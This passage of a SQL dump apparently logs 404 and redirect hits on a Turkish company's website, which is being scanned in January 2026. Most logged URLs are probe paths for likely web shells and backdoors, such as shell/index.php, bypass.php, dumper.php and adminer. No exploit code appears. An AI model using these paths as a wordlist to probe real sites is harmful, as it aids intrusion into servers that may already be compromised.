00:00:00',301),(55722,'http://mail.3s-technologies.com.tr/en/.well-known/new.php',NULL,'','',1,0,'2026-01-09 21:10:01','0000-00-00 00:00:00',301),(55723,'http://mail.3s-technologies.com.tr/en/orxnwdbb.php',NULL,'','',1,0,'2026-01-09 21:10:02','0000-00-00 00:00:00',301),(55724,'http://mail.3s-technologies.com.tr/en/v3.php',NULL,'','',1,0,'2026-01-09 21:10:03','0000-00-00 00:00:00',301),(55725,'http://mail.3s-technologies.com.tr/en/fs8.php',NULL,'','',1,0,'2026-01-09 21:10:03','0000-00-00 00:00:00',301),(55726,'http://mail.3s-technologies.com.tr/en/wp-admin/includes/links.php',NULL,'','',1,0,'2026-01-09 21:10:04','0000-00-00 00:00:00',301),(55727,'http://mail.3s-technologies.com.tr/en/backup/dumper.php',NULL,'','',1,0,'2026-01-09 21:10:05','0000-00-00 00:00:00',301),(55728,'http://mail.3s-technologies.com.tr/en/adminer-4.5.0-mysql.php',NULL,'','',1,0,'2026-01-09 21:10:05','0000-00-00 00:00:00',301),(55729,'http://mail.3s-technologies.com.tr/en/site/wp-class.php',NULL,'','',1,0,'2026-01-09 21:10:06','0000-00-00 00:00:00',301),(55730,'http://mail.3s-technologies.com.tr/en/video.php',NULL,'','',1,0,'2026-01-09 21:10:07','0000-00-00 00:00:00',301),(55731,'http://mail.3s-technologies.com.tr/en/scgi-bin.php',NULL,'','',1,0,'2026-01-09 21:10:07','0000-00-00 00:00:00',301),(55732,'http://mail.3s-technologies.com.tr/en/finest09.php',NULL,'','',1,0,'2026-01-09 21:10:08','0000-00-00 00:00:00',301),(55733,'http://mail.3s-technologies.com.tr/en/1100.php',NULL,'','',1,0,'2026-01-09 21:10:09','0000-00-00 00:00:00',301),(55734,'http://mail.3s-technologies.com.tr/en/iov.php',NULL,'','',1,0,'2026-01-09 21:10:09','0000-00-00 00:00:00',301),(55735,'http://mail.3s-technologies.com.tr/en/app/config.php',NULL,'','',1,0,'2026-01-09 21:10:10','0000-00-00 00:00:00',301),(55736,'http://mail.3s-technologies.com.tr/en/.well-known/ioxi-o.php',NULL,'','',1,0,'2026-01-09 21:10:11','0000-00-00 00:00:00',301),(55737,'http://mail.3s-technologies.com.tr/en/.well-known.php',NULL,'','',1,0,'2026-01-09 21:10:11','0000-00-00 00:00:00',301),(55738,'http://mail.3s-technologies.com.tr/en/2024.php',NULL,'','',1,0,'2026-01-09 21:10:14','0000-00-00 00:00:00',301),(55739,'http://mail.3s-technologies.com.tr/en/403.php',NULL,'','',1,0,'2026-01-09 21:10:14','0000-00-00 00:00:00',301),(55740,'http://mail.3s-technologies.com.tr/en/diff.php',NULL,'','',1,0,'2026-01-09 21:10:15','0000-00-00 00:00:00',301),(55741,'http://mail.3s-technologies.com.tr/en/engine.php',NULL,'','',1,0,'2026-01-09 21:10:16','0000-00-00 00:00:00',301),(55742,'http://mail.3s-technologies.com.tr/en/id3.php',NULL,'','',1,0,'2026-01-09 21:10:16','0000-00-00 00:00:00',301),(55743,'http://mail.3s-technologies.com.tr/en/ixr.php',NULL,'','',1,0,'2026-01-09 21:10:17','0000-00-00 00:00:00',301),(55744,'http://mail.3s-technologies.com.tr/en/simplepie.php',NULL,'','',1,0,'2026-01-09 21:10:18','0000-00-00 00:00:00',301),(55745,'http://mail.3s-technologies.com.tr/en/text.php',NULL,'','',1,0,'2026-01-09 21:10:19','0000-00-00 00:00:00',301),(55746,'http://mail.3s-technologies.com.tr/en/aahana.php',NULL,'','',1,0,'2026-01-09 21:10:19','0000-00-00 00:00:00',301),(55747,'http://3s-technologies.com.tr/en/wp-includes/assets/ty.php',NULL,'https://www.google.co.uk/','',7,0,'2026-01-09 22:54:56','0000-00-00 00:00:00',301),(55748,'http://3s-technologies.com.tr/en/tinyy.php',NULL,'https://www.google.fr/','',3,0,'2026-01-09 22:55:05','0000-00-00 00:00:00',301),(55749,'http://3s-technologies.com.tr/en/bgymj.php',NULL,'https://www.google.de/','',8,0,'2026-01-09 22:55:44','0000-00-00 00:00:00',301),(55750,'http://www.3s-technologies.com.tr/tr/amax.php',NULL,'','',9,0,'2026-01-10 01:59:33','0000-00-00 00:00:00',301),(55751,'http://www.3s-technologies.com.tr/tr/an8.php',NULL,'','',1,0,'2026-01-10 01:59:37','0000-00-00 00:00:00',301),(55752,'http://www.3s-technologies.com.tr/tr/byp8.php',NULL,'','',3,0,'2026-01-10 01:59:41','0000-00-00 00:00:00',301),(55753,'http://www.3s-technologies.com.tr/tr/xrp.php',NULL,'','',1,0,'2026-01-10 01:59:43','0000-00-00 00:00:00',301),(55754,'http://www.3s-technologies.com.tr/tr/ws28.php',NULL,'','',1,0,'2026-01-10 01:59:44','0000-00-00 00:00:00',301),(55755,'http://www.3s-technologies.com.tr/tr/app.php',NULL,'','',5,0,'2026-01-10 01:59:47','0000-00-00 00:00:00',301),(55756,'http://www.3s-technologies.com.tr/tr/dox.php',NULL,'','',2,0,'2026-01-10 01:59:49','0000-00-00 00:00:00',301),(55757,'http://www.3s-technologies.com.tr/tr/xa.php',NULL,'','',8,0,'2026-01-10 01:59:54','0000-00-00 00:00:00',301),(55758,'http://www.3s-technologies.com.tr/tr/f8.php',NULL,'','',1,0,'2026-01-10 01:59:55','0000-00-00 00:00:00',301),(55759,'http://www.3s-technologies.com.tr/tr/moon3.php',NULL,'','',3,0,'2026-01-10 01:59:56','0000-00-00 00:00:00',301),(55760,'http://www.3s-technologies.com.tr/tr/x7x.php',NULL,'','',3,0,'2026-01-10 01:59:58','0000-00-00 00:00:00',301),(55761,'http://www.3s-technologies.com.tr/tr/xxxx.php',NULL,'','',3,0,'2026-01-10 01:59:59','0000-00-00 00:00:00',301),(55762,'http://www.3s-technologies.com.tr/tr/gec.php',NULL,'','',2,0,'2026-01-10 02:00:01','0000-00-00 00:00:00',301),(55763,'http://www.3s-technologies.com.tr/tr/file30.php',NULL,'','',2,0,'2026-01-10 02:00:04','0000-00-00 00:00:00',301),(55764,'http://www.3s-technologies.com.tr/tr/bless14.php',NULL,'','',1,0,'2026-01-10 02:00:08','0000-00-00 00:00:00',301),(55765,'http://www.3s-technologies.com.tr/tr/oo.php',NULL,'','',1,0,'2026-01-10 02:00:11','0000-00-00 00:00:00',301),(55766,'http://www.3s-technologies.com.tr/tr/jga.php',NULL,'','',12,0,'2026-01-10 02:00:14','0000-00-00 00:00:00',301),(55767,'http://www.3s-technologies.com.tr/tr/wp-admin/new2.php',NULL,'','',1,0,'2026-01-10 02:00:16','0000-00-00 00:00:00',301),(55768,'http://www.3s-technologies.com.tr/tr/ws29.php',NULL,'','',1,0,'2026-01-10 02:00:17','0000-00-00 00:00:00',301),(55769,'http://www.3s-technologies.com.tr/tr/wen.php',NULL,'','',11,0,'2026-01-10 02:00:18','0000-00-00 00:00:00',301),(55770,'http://www.3s-technologies.com.tr/tr/sitemaps.php',NULL,'','',1,0,'2026-01-10 02:00:22','0000-00-00 00:00:00',301),(55771,'http://www.3s-technologies.com.tr/tr/css/install.php',NULL,'','',1,0,'2026-01-10 02:00:24','0000-00-00 00:00:00',301),(55772,'http://www.3s-technologies.com.tr/tr/img.php',NULL,'','',2,0,'2026-01-10 02:00:27','0000-00-00 00:00:00',301),(55773,'http://www.3s-technologies.com.tr/tr/wp-sign.php',NULL,'','',1,0,'2026-01-10 02:00:34','0000-00-00 00:00:00',301),(55774,'http://www.3s-technologies.com.tr/tr/ppp.php',NULL,'','',2,0,'2026-01-10 02:00:35','0000-00-00 00:00:00',301),(55775,'http://www.3s-technologies.com.tr/tr/ov-simple1.php',NULL,'','',10,0,'2026-01-10 02:00:37','0000-00-00 00:00:00',301),(55776,'http://www.3s-technologies.com.tr/tr/wp-help.php',NULL,'','',1,0,'2026-01-10 02:00:40','0000-00-00 00:00:00',301),(55777,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/wp-trackback.php',NULL,'','',1,0,'2026-01-10 02:00:42','0000-00-00 00:00:00',301),(55778,'http://www.3s-technologies.com.tr/tr/hly.php',NULL,'','',1,0,'2026-01-10 02:00:44','0000-00-00 00:00:00',301),(55779,'http://www.3s-technologies.com.tr/tr/xp.php',NULL,'','',1,0,'2026-01-10 02:00:50','0000-00-00 00:00:00',301),(55780,'http://www.3s-technologies.com.tr/tr/yes.php',NULL,'','',1,0,'2026-01-10 02:00:51','0000-00-00 00:00:00',301),(55781,'http://www.3s-technologies.com.tr/tr/has.php',NULL,'','',1,0,'2026-01-10 02:00:55','0000-00-00 00:00:00',301),(55782,'http://www.3s-technologies.com.tr/tr/ooj.php',NULL,'','',1,0,'2026-01-10 02:00:57','0000-00-00 00:00:00',301),(55783,'http://www.3s-technologies.com.tr/tr/orm.php',NULL,'','',1,0,'2026-01-10 02:00:58','0000-00-00 00:00:00',301),(55784,'http://www.3s-technologies.com.tr/tr/yep.php',NULL,'','',1,0,'2026-01-10 02:00:59','0000-00-00 00:00:00',301),(55785,'http://www.3s-technologies.com.tr/tr/x3.php',NULL,'','',1,0,'2026-01-10 02:01:00','0000-00-00 00:00:00',301),(55786,'http://www.3s-technologies.com.tr/tr/jju.php',NULL,'','',1,0,'2026-01-10 02:01:05','0000-00-00 00:00:00',301),(55787,'http://www.3s-technologies.com.tr/tr/rsnu.php',NULL,'','',1,0,'2026-01-10 02:01:06','0000-00-00 00:00:00',301),(55788,'http://www.3s-technologies.com.tr/tr/ocxla.php',NULL,'','',2,0,'2026-01-10 02:01:16','0000-00-00 00:00:00',301),(55789,'http://www.3s-technologies.com.tr/tr/tt.php',NULL,'','',6,0,'2026-01-10 02:01:17','0000-00-00 00:00:00',301),(55790,'http://www.3s-technologies.com.tr/tr/resp.php',NULL,'','',1,0,'2026-01-10 02:01:18','0000-00-00 00:00:00',301),(55791,'http://www.3s-technologies.com.tr/tr/100.kb.php',NULL,'','',4,0,'2026-01-10 02:01:19','0000-00-00 00:00:00',301),(55792,'http://www.3s-technologies.com.tr/tr/wqqs.php',NULL,'','',3,0,'2026-01-10 02:01:20','0000-00-00 00:00:00',301),(55793,'http://www.3s-technologies.com.tr/tr/zwq13.php',NULL,'','',3,0,'2026-01-10 02:01:21','0000-00-00 00:00:00',301),(55794,'http://www.3s-technologies.com.tr/tr/rtx.php',NULL,'','',4,0,'2026-01-10 02:01:22','0000-00-00 00:00:00',301),(55795,'http://www.3s-technologies.com.tr/tr/clasa99.php',NULL,'','',3,0,'2026-01-10 02:01:25','0000-00-00 00:00:00',301),(55796,'http://www.3s-technologies.com.tr/tr/fasx.php',NULL,'','',2,0,'2026-01-10 02:01:26','0000-00-00 00:00:00',301),(55797,'http://www.3s-technologies.com.tr/tr/wp-includes/js/codemirror/info.php',NULL,'','',1,0,'2026-01-10 02:01:31','0000-00-00 00:00:00',301),(55798,'http://www.3s-technologies.com.tr/en/gastenboek.php',NULL,'','',1,0,'2026-01-10 02:01:31','0000-00-00 00:00:00',301),(55799,'http://www.3s-technologies.com.tr/en/third_party/kcfinder/upload.php',NULL,'','',1,0,'2026-01-10 02:01:32','0000-00-00 00:00:00',301),(55800,'http://www.3s-technologies.com.tr/en/lock11.php',NULL,'','',1,0,'2026-01-10 02:01:33','0000-00-00 00:00:00',301),(55801,'http://www.3s-technologies.com.tr/en/api137.php',NULL,'','',1,0,'2026-01-10 02:01:34','0000-00-00 00:00:00',301),(55802,'http://www.3s-technologies.com.tr/en/class629.php',NULL,'','',1,0,'2026-01-10 02:01:35','0000-00-00 00:00:00',301),(55803,'http://www.3s-technologies.com.tr/en/wp670.php',NULL,'','',1,0,'2026-01-10 02:01:36','0000-00-00 00:00:00',301),(55804,'http://www.3s-technologies.com.tr/en/v1.php',NULL,'','',1,0,'2026-01-10 02:01:37','0000-00-00 00:00:00',301),(55805,'http://www.3s-technologies.com.tr/en/xx.php',NULL,'','',1,0,'2026-01-10 02:01:38','0000-00-00 00:00:00',301),(55806,'http://www.3s-technologies.com.tr/en/wp-admin/userk.php',NULL,'','',1,0,'2026-01-10 02:01:39','0000-00-00 00:00:00',301),(55807,'http://www.3s-technologies.com.tr/en/skinmain.php',NULL,'','',1,0,'2026-01-10 02:01:41','0000-00-00 00:00:00',301),(55808,'http://www.3s-technologies.com.tr/en/.well-known/new.php',NULL,'','',1,0,'2026-01-10 02:01:42','0000-00-00 00:00:00',301),(55809,'http://www.3s-technologies.com.tr/en/orxnwdbb.php',NULL,'','',1,0,'2026-01-10 02:01:43','0000-00-00 00:00:00',301),(55810,'http://www.3s-technologies.com.tr/en/v3.php',NULL,'','',1,0,'2026-01-10 02:01:44','0000-00-00 00:00:00',301),(55811,'http://www.3s-technologies.com.tr/en/fs8.php',NULL,'','',1,0,'2026-01-10 02:01:45','0000-00-00 00:00:00',301),(55812,'http://www.3s-technologies.com.tr/en/wp-admin/includes/links.php',NULL,'','',1,0,'2026-01-10 02:01:46','0000-00-00 00:00:00',301),(55813,'http://www.3s-technologies.com.tr/en/backup/dumper.php',NULL,'','',1,0,'2026-01-10 02:01:46','0000-00-00 00:00:00',301),(55814,'http://www.3s-technologies.com.tr/en/adminer-4.5.0-mysql.php',NULL,'','',1,0,'2026-01-10 02:01:47','0000-00-00 00:00:00',301),(55815,'http://www.3s-technologies.com.tr/en/site/wp-class.php',NULL,'','',1,0,'2026-01-10 02:01:48','0000-00-00 00:00:00',301),(55816,'http://www.3s-technologies.com.tr/en/video.php',NULL,'','',1,0,'2026-01-10 02:01:49','0000-00-00 00:00:00',301),(55817,'http://www.3s-technologies.com.tr/en/scgi-bin.php',NULL,'','',1,0,'2026-01-10 02:01:50','0000-00-00 00:00:00',301),(55818,'http://www.3s-technologies.com.tr/en/finest09.php',NULL,'','',1,0,'2026-01-10 02:01:51','0000-00-00 00:00:00',301),(55819,'http://www.3s-technologies.com.tr/en/1100.php',NULL,'','',1,0,'2026-01-10 02:01:52','0000-00-00 00:00:00',301),(55820,'http://www.3s-technologies.com.tr/en/iov.php',NULL,'','',1,0,'2026-01-10 02:01:53','0000-00-00 00:00:00',301),(55821,'http://www.3s-technologies.com.tr/en/app/config.php',NULL,'','',1,0,'2026-01-10 02:01:54','0000-00-00 00:00:00',301),(55822,'http://www.3s-technologies.com.tr/en/.well-known/ioxi-o.php',NULL,'','',1,0,'2026-01-10 02:01:55','0000-00-00 00:00:00',301),(55823,'http://www.3s-technologies.com.tr/en/.well-known.php',NULL,'','',1,0,'2026-01-10 02:01:56','0000-00-00 00:00:00',301),(55824,'http://www.3s-technologies.com.tr/en/2024.php',NULL,'','',1,0,'2026-01-10 02:02:00','0000-00-00 00:00:00',301),(55825,'http://www.3s-technologies.com.tr/en/403.php',NULL,'','',1,0,'2026-01-10 02:02:01','0000-00-00 00:00:00',301),(55826,'http://www.3s-technologies.com.tr/en/diff.php',NULL,'','',1,0,'2026-01-10 02:02:02','0000-00-00 00:00:00',301),(55827,'http://www.3s-technologies.com.tr/en/engine.php',NULL,'','',1,0,'2026-01-10 02:02:03','0000-00-00 00:00:00',301),(55828,'http://www.3s-technologies.com.tr/en/id3.php',NULL,'','',1,0,'2026-01-10 02:02:04','0000-00-00 00:00:00',301),(55829,'http://www.3s-technologies.com.tr/en/ixr.php',NULL,'','',1,0,'2026-01-10 02:02:05','0000-00-00 00:00:00',301),(55830,'http://www.3s-technologies.com.tr/en/simplepie.php',NULL,'','',1,0,'2026-01-10 02:02:06','0000-00-00 00:00:00',301),(55831,'http://www.3s-technologies.com.tr/en/text.php',NULL,'','',1,0,'2026-01-10 02:02:07','0000-00-00 00:00:00',301),(55832,'http://www.3s-technologies.com.tr/en/aahana.php',NULL,'','',1,0,'2026-01-10 02:02:08','0000-00-00 00:00:00',301),(55833,'http://www.3s-technologies.com.tr/en/ws35.php',NULL,'','',1,0,'2026-01-10 02:02:09','0000-00-00 00:00:00',301),(55834,'http://3s-technologies.com.tr/tr/bitrix/templates/.default/lang/ru/page_templates/.contents.php',NULL,'','',3,0,'2026-01-10 11:11:10','0000-00-00 00:00:00',301),(55835,'http://www.3s-technologies.com.tr/tr/motu.php',NULL,'','',15,0,'2026-01-10 13:32:35','0000-00-00 00:00:00',301),(55836,'http://www.3s-technologies.com.tr/tr/xsas.php',NULL,'','',5,0,'2026-01-10 13:32:35','0000-00-00 00:00:00',301),(55837,'http://www.3s-technologies.com.tr/tr/xwpg.php',NULL,'','',4,0,'2026-01-10 13:32:36','0000-00-00 00:00:00',301),(55838,'http://www.3s-technologies.com.tr/tr/baee.php',NULL,'','',1,0,'2026-01-10 13:32:37','0000-00-00 00:00:00',301),(55839,'http://www.3s-technologies.com.tr/tr/iov.php',NULL,'','',1,0,'2026-01-10 13:32:37','0000-00-00 00:00:00',301),(55840,'http://www.3s-technologies.com.tr/tr/mga.php',NULL,'','',3,0,'2026-01-10 13:32:38','0000-00-00 00:00:00',301),(55841,'http://www.3s-technologies.com.tr/tr/rendi59.php',NULL,'','',1,0,'2026-01-10 13:32:39','0000-00-00 00:00:00',301),(55842,'http://www.3s-technologies.com.tr/tr/bgymj.php',NULL,'','',17,0,'2026-01-10 13:32:40','0000-00-00 00:00:00',301),(55843,'http://www.3s-technologies.com.tr/tr/assacc.php',NULL,'','',3,0,'2026-01-10 13:32:40','0000-00-00 00:00:00',301),(55844,'http://www.3s-technologies.com.tr/tr/monso.php',NULL,'','',1,0,'2026-01-10 13:32:42','0000-00-00 00:00:00',301),(55845,'http://www.3s-technologies.com.tr/tr/bnnof6.php',NULL,'','',1,0,'2026-01-10 13:32:42','0000-00-00 00:00:00',301),(55846,'http://3s-technologies.com.tr/en/wp-content/plugins/erinyani/baxa1.php7',NULL,'https://duckduckgo.com/','',4,0,'2026-01-10 17:35:49','0000-00-00 00:00:00',301),(55847,'http://3s-technologies.com.tr/en/wp-content/plugins/secure-fortress',NULL,'https://www.google.com/','',4,0,'2026-01-10 17:35:50','0000-00-00 00:00:00',301),(55848,'http://3s-technologies.com.tr/en/contact.php',NULL,'https://www.google.co.uk/','',4,0,'2026-01-10 17:35:52','0000-00-00 00:00:00',301),(55849,'http://3s-technologies.com.tr/en/wp-content/plugins/janusv2/janus.php',NULL,'https://www.bing.com/','',4,0,'2026-01-10 17:35:54','0000-00-00 00:00:00',301),(55850,'http://3s-technologies.com.tr/en/wp-owl.php',NULL,'https://www.google.co.uk/','',4,0,'2026-01-10 17:35:57','0000-00-00 00:00:00',301),(55851,'http://3s-technologies.com.tr/en/motu.php',NULL,'https://www.google.de/','',4,0,'2026-01-10 17:36:15','0000-00-00 00:00:00',301),(55852,'http://3s-technologies.com.tr/en/wk/index.php',NULL,'https://www.bing.com/','',4,0,'2026-01-10 17:36:21','0000-00-00 00:00:00',301),(55853,'http://3s-technologies.com.tr/en/xc.php',NULL,'https://www.google.com/','',4,0,'2026-01-10 17:36:30','0000-00-00 00:00:00',301),(55854,'http://3s-technologies.com.tr/en/images/class-config.php',NULL,'https://www.google.com/','',4,0,'2026-01-10 17:36:35','0000-00-00 00:00:00',301),(55855,'http://3s-technologies.com.tr/en/fw',NULL,'https://www.google.fr/','',3,0,'2026-01-10 19:22:00','0000-00-00 00:00:00',301),(55856,'http://3s-technologies.com.tr/en/.tmb',NULL,'https://www.google.com/','',3,0,'2026-01-10 19:22:01','0000-00-00 00:00:00',301),(55857,'http://3s-technologies.com.tr/en/wp-admin/ccx',NULL,'https://www.google.co.uk/','',3,0,'2026-01-10 19:22:10','0000-00-00 00:00:00',301),(55858,'http://3s-technologies.com.tr/en/wp-content/plugins/classic-editor',NULL,'https://duckduckgo.com/','',8,0,'2026-01-10 19:22:17','0000-00-00 00:00:00',301),(55859,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentyfive/functions.php',NULL,'https://www.google.fr/','',2,0,'2026-01-10 19:50:55','0000-00-00 00:00:00',301),(55860,'http://3s-technologies.com.tr/en/ws28.php',NULL,'https://www.google.com/','',2,0,'2026-01-10 19:51:01','0000-00-00 00:00:00',301),(55861,'http://3s-technologies.com.tr/en/lu4.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-10 19:51:07','0000-00-00 00:00:00',301),(55862,'http://3s-technologies.com.tr/en/wp-content/themes/x/bypass.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-10 19:51:10','0000-00-00 00:00:00',301),(55863,'http://3s-technologies.com.tr/en/wp-content/plugins/phpad/as.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-10 19:51:28','0000-00-00 00:00:00',301),(55864,'http://3s-technologies.com.tr/en/.trash7206/index.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-10 19:51:37','0000-00-00 00:00:00',301),(55865,'http://3s-technologies.com.tr/en/ca5.php',NULL,'https://www.yahoo.com/','',1,0,'2026-01-10 22:20:57','0000-00-00 00:00:00',301),(55866,'http://3s-technologies.com.tr/en/wp-content/dn.php',NULL,'https://www.google.fr/','',1,0,'2026-01-10 22:21:03','0000-00-00 00:00:00',301),(55867,'http://3s-technologies.com.tr/en/mln.php',NULL,'https://duckduckgo.com/','',1,0,'2026-01-10 22:21:10','0000-00-00 00:00:00',301),(55868,'http://3s-technologies.com.tr/en/accah.php',NULL,'https://www.google.com/','',1,0,'2026-01-10 22:21:12','0000-00-00 00:00:00',301),(55869,'http://3s-technologies.com.tr/en/.trash7309/index.php',NULL,'https://www.yahoo.com/','',1,0,'2026-01-10 22:21:14','0000-00-00 00:00:00',301),(55870,'http://3s-technologies.com.tr/en/sf.php',NULL,'https://www.google.de/','',1,0,'2026-01-10 22:21:15','0000-00-00 00:00:00',301),(55871,'http://3s-technologies.com.tr/en/xwpg.php',NULL,'https://www.bing.com/','',1,0,'2026-01-10 22:21:19','0000-00-00 00:00:00',301),(55872,'http://3s-technologies.com.tr/en/wp-content/plugins/shell/index.php',NULL,'https://www.yahoo.com/','',1,0,'2026-01-11 12:12:48','0000-00-00 00:00:00',301),(55873,'http://3s-technologies.com.tr/en/baxa1.php',NULL,'https://www.google.co.uk/','',1,0,'2026-01-11 12:12:56','0000-00-00 00:00:00',301),(55874,'http://3s-technologies.com.tr/tr/bitrix/js/main/jquery/jquery-1.8.3.min.js.php',NULL,'','',4,0,'2026-01-11 15:29:05','0000-00-00 00:00:00',301),(55875,'http://3s-technologies.com.tr/tr/fu.php',NULL,'','',1,0,'2026-01-12 02:01:40','0000-00-00 00:00:00',301),(55876,'http://3s-technologies.com.tr/tr/wkindex.php',NULL,'','',1,0,'2026-01-12 02:01:41','0000-00-00 00:00:00',301),(55877,'http://3s-technologies.com.tr/tr/wsorgen.php',NULL,'','',1,0,'2026-01-12 02:01:42','0000-00-00 00:00:00',301),(55878,'http://3s-technologies.com.tr/tr/sadd5.php',NULL,'','',2,0,'2026-01-12 02:01:59','0000-00-00 00:00:00',301),(55879,'http://3s-technologies.com.tr/tr/lyy.php',NULL,'','',1,0,'2026-01-12 02:02:25','0000-00-00 00:00:00',301),(55880,'http://3s-technologies.com.tr/tr/admin/resources/dummy/log.php',NULL,'','',1,0,'2026-01-12 02:02:36','0000-00-00 00:00:00',301),(55881,'http://3s-technologies.com.tr/tr/css/license.php',NULL,'','',1,0,'2026-01-12 02:02:41','0000-00-00 00:00:00',301),(55882,'http://3s-technologies.com.tr/tr/wp-content/cache',NULL,'','',8,0,'2026-01-12 02:02:46','0000-00-00 00:00:00',301),(55883,'http://3s-technologies.com.tr/tr/da222.php',NULL,'','',1,0,'2026-01-12 02:02:50','0000-00-00 00:00:00',301),(55884,'http://3s-technologies.com.tr/tr/batmplus.php',NULL,'','',1,0,'2026-01-12 02:02:51','0000-00-00 00:00:00',301),(55885,'http://3s-technologies.com.tr/tr/x',NULL,'','',37,0,'2026-01-12 02:02:53','0000-00-00 00:00:00',301),(55886,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/fields/cache',NULL,'','',1,0,'2026-01-12 02:02:59','0000-00-00 00:00:00',301),(55887,'http://3s-technologies.com.tr/en/bjfl.php',NULL,'https://www.yahoo.com/','',1,0,'2026-01-12 13:39:10','0000-00-00 00:00:00',301),(55888,'http://3s-technologies.com.tr/en/wp-content/themes/pridmag/404.php',NULL,'https://www.google.com/','',1,0,'2026-01-12 13:39:15','0000-00-00 00:00:00',301),(55889,'http://3s-technologies.com.tr/en/ad.php',NULL,'https://www.yahoo.com/','',1,0,'2026-01-12 13:39:24','0000-00-00 00:00:00',301),(55890,'http://3s-technologies.com.tr/en/wp-admin/css/colors/index.php',NULL,'https://duckduckgo.com/','',3,0,'2026-01-12 13:39:28','0000-00-00 00:00:00',301),(55891,'http://3s-technologies.com.tr/en/wp-content/xc.php',NULL,'https://www.yahoo.com/','',1,0,'2026-01-12 13:39:30','0000-00-00 00:00:00',301),(55892,'http://3s-technologies.com.tr/en/he.php',NULL,'https://www.yahoo.com/','',1,0,'2026-01-12 13:39:34','0000-00-00 00:00:00',301),(55893,'http://3s-technologies.com.tr/en/wp-content/file.php',NULL,'https://www.google.fr/','',1,0,'2026-01-12 13:39:37','0000-00-00 00:00:00',301),(55894,'http://3s-technologies.com.tr/en/wp-content/plugins/zgdsfagk/rk3.php',NULL,'https://www.bing.com/','',1,0,'2026-01-12 13:39:38','0000-00-00 00:00:00',301),(55895,'http://3s-technologies.com.tr/en/randkeyword.php7',NULL,'https://www.yahoo.com/','',1,0,'2026-01-12 13:39:46','0000-00-00 00:00:00',301),(55896,'http://mail.3s-technologies.com.tr/tr/rymmm.php',NULL,'','',1,0,'2026-01-12 15:26:18','0000-00-00 00:00:00',301),(55897,'http://mail.3s-technologies.com.tr/tr/ws34.php',NULL,'','',4,0,'2026-01-12 15:26:19','0000-00-00 00:00:00',301),(55898,'http://mail.3s-technologies.com.tr/tr/ws45.php',NULL,'','',4,0,'2026-01-12 15:26:20','0000-00-00 00:00:00',301),(55899,'http://mail.3s-technologies.com.tr/tr/xxw.php',NULL,'','',18,0,'2026-01-12 15:26:21','0000-00-00 00:00:00',301),(55900,'http://mail.3s-technologies.com.tr/tr/ws33.php',NULL,'','',3,0,'2026-01-12 15:26:22','0000-00-00 00:00:00',301),(55901,'http://mail.3s-technologies.com.tr/tr/lm13.php',NULL,'','',3,0,'2026-01-12 15:26:23','0000-00-00 00:00:00',301),(55902,'http://mail.3s-technologies.com.tr/tr/ws38.php',NULL,'','',7,0,'2026-01-12 15:26:24','0000-00-00 00:00:00',301),(55903,'http://mail.3s-technologies.com.tr/tr/xeqdlun.php',NULL,'','',3,0,'2026-01-12 15:26:25','0000-00-00 00:00:00',301),(55904,'http://mail.3s-technologies.com.tr/tr/ws37.php',NULL,'','',4,0,'2026-01-12 15:26:26','0000-00-00 00:00:00',301),(55905,'http://mail.3s-technologies.com.tr/tr/ws36.php',NULL,'','',8,0,'2026-01-12 15:26:27','0000-00-00 00:00:00',301),(55906,'http://mail.3s-technologies.com.tr/tr/xinder.php',NULL,'','',1,0,'2026-01-12 15:26:28','0000-00-00 00:00:00',301),(55907,'http://mail.3s-technologies.com.tr/tr/test/lm.php',NULL,'','',1,0,'2026-01-12 15:26:31','0000-00-00 00:00:00',301),(55908,'http://mail.3s-technologies.com.tr/tr/style2.php',NULL,'','',1,0,'2026-01-12 15:26:32','0000-00-00 00:00:00',301),(55909,'http://mail.3s-technologies.com.tr/tr/wpupex.php',NULL,'','',1,0,'2026-01-12 15:26:34','0000-00-00 00:00:00',301),(55910,'http://mail.3s-technologies.com.tr/tr/nks.php',NULL,'','',1,0,'2026-01-12 15:26:36','0000-00-00 00:00:00',301),(55911,'http://mail.3s-technologies.com.tr/tr/cache/wp-post-data.php',NULL,'','',1,0,'2026-01-12 15:26:45','0000-00-00 00:00:00',301),(55912,'http://mail.3s-technologies.com.tr/tr/uploads/casper.php',NULL,'','',1,0,'2026-01-12 15:26:46','0000-00-00 00:00:00',301),(55913,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/commentv.php',NULL,'','',3,0,'2026-01-12 15:26:48','0000-00-00 00:00:00',301),(55914,'http://mail.3s-technologies.com.tr/tr/dom.php',NULL,'','',8,0,'2026-01-12 15:26:50','0000-00-00 00:00:00',301),(55915,'http://mail.3s-technologies.com.tr/tr/bga.php',NULL,'','',1,0,'2026-01-12 15:26:53','0000-00-00 00:00:00',301),(55916,'http://mail.3s-technologies.com.tr/tr/sad/about.php',NULL,'','',11,0,'2026-01-12 15:26:54','0000-00-00 00:00:00',301),(55917,'http://mail.3s-technologies.com.tr/tr/lov.php',NULL,'','',2,0,'2026-01-12 15:26:57','0000-00-00 00:00:00',301),(55918,'http://mail.3s-technologies.com.tr/tr/avaa.php',NULL,'','',3,0,'2026-01-12 15:26:59','0000-00-00 00:00:00',301),(55919,'http://mail.3s-technologies.com.tr/tr/nwwha.php',NULL,'','',1,0,'2026-01-12 15:27:00','0000-00-00 00:00:00',301),(55920,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/moon.php',NULL,'','',6,0,'2026-01-12 15:27:03','0000-00-00 00:00:00',301),(55921,'http://mail.3s-technologies.com.tr/tr/skin/install/default/security.php',NULL,'','',5,0,'2026-01-12 15:27:05','0000-00-00 00:00:00',301),(55922,'http://mail.3s-technologies.com.tr/tr/~norapump/hah.php',NULL,'','',5,0,'2026-01-12 15:27:06','0000-00-00 00:00:00',301),(55923,'http://mail.3s-technologies.com.tr/tr/wp-admin/class-db.php',NULL,'','',6,0,'2026-01-12 15:27:07','0000-00-00 00:00:00',301),(55924,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/achdxhv/languages/admin.php',NULL,'','',5,0,'2026-01-12 15:27:11','0000-00-00 00:00:00',301),(55925,'http://mail.3s-technologies.com.tr/tr/hzz.php',NULL,'','',5,0,'2026-01-12 15:27:12','0000-00-00 00:00:00',301),(55926,'http://mail.3s-technologies.com.tr/tr/rezor.php',NULL,'','',5,0,'2026-01-12 15:27:14','0000-00-00 